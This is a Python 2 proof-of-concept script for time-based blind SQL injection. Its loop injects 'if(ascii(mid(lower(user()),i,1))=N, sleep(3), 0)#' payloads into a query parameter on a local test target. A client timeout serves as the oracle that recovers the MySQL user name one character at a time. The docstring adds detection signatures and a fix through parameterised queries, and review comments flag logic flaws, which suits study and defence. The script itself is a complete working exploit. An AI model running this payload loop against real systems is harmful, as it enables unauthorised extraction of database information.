#encoding=utf-8
"""Time-based blind SQL injection proof-of-concept (Python 2, httplib).

Recovers the MySQL ``user()`` string one character at a time from a local
test target (``127.0.0.1``, ``/sql.php?cmd=1``): each probe injects
``if(<condition>, sleep(3), 0)`` into the ``cmd`` parameter and treats a
request that trips the 3 s client timeout as "condition true".

Defender notes (what this looks like from the other side):

* Detection: the loop below emits up to ``len(payloads) * 20`` near-identical
  GET requests to the same path, each with ``ascii(mid(lower(user()`` /
  ``sleep(`` in the URL-encoded query string and each taking ~3 s when the
  guess is right. That combination (repetitive query-string SQL functions,
  fixed User-Agent, long server-side latency) is a straightforward log /
  WAF signature.
* Mitigation: the injection only works because ``cmd`` is concatenated into
  a SQL statement. Parameterised queries and typing the parameter as an
  integer before it reaches the database remove the vector entirely.
"""
import httplib
import time
import string   # NOTE(review): imported but not referenced below
import sys      # NOTE(review): imported but not referenced below
import urllib

# Static browser-like request headers sent with every probe. Because they
# never vary, the User-Agent alone is a usable correlation key in access logs.
header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
          'Accept-Language':'zh-cn,zh;q=0.5',
          'Cache-Control':'max-age=0',
          'Connection':'keep-alive',
          'Keep-Alive':'115',
          'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14'}

# Candidate alphabet tried at every position. A character outside this set is
# never matched, so that position is silently skipped (nothing appended) and
# the outer loop moves on to the next index.
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())

# Accumulated result; positions 1..20 of lower(user()) are probed in order.
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:
            # Condition: the i-th character of lower(user()) equals this
            # candidate (compared by ASCII code).
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            # Wrap it so a true condition stalls the query for 3 s; the
            # trailing '#' comments out the remainder of the original SQL.
            s = " and (if(%s,sleep(3),0))#" % s
            # timeout=3 is deliberately equal to the injected sleep(3): a true
            # guess makes the server respond later than the client waits, so
            # the socket timeout raises and control lands in the except branch.
            conn = httplib.HTTPConnection('127.0.0.1', timeout=3)
            conn.request(method='GET', url="/sql.php?cmd=1%s" % urllib.quote(s),headers=header)
            conn.getresponse()
            conn.close()
            # print '.',
        except Exception,e:
            # print e
            # Any exception is treated as a hit, not only socket.timeout: a
            # refused connection or a DNS failure would also append a
            # character here and be reported as part of the user name.
            user += payload
            # Trailing comma: Python 2 print without a newline.
            print ' [surprise]:', user,
            # Pause before probing the next position; presumably to let the
            # server-side sleep() finish before the next request -- intent is
            # not stated in the original.
            time.sleep(3.0)
            break

print ' [Done] MySQL user is %s' % user